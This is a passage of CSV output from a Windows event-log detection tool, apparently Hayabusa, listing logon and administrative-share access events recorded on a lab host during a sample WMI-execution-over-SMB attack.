+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18ad01,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad10,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18ad1f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63564 : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18b247,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\DesktopTileResources\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Downloaded Program Files\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ImmersiveControlPanel\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\media\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.352 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Offline Web Pages\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ToastData\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.368 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ar : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.384 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\bg : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\cs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\de : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\el : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\en : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\es : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\et : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.402 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\fr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\he : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\hu : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\it : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ja : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ko : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.416 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\lv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\nl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\no : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\pt-BR : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ro : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\ru : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sl : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.432 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sr-Latn-RS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.447 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\sv : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\th : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\tr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\uk : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANS : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HANT : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\ADFS\zh-HK : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppCompat\Programs\DevInvCache : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.448 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\apppatch64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\Custom\Custom64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 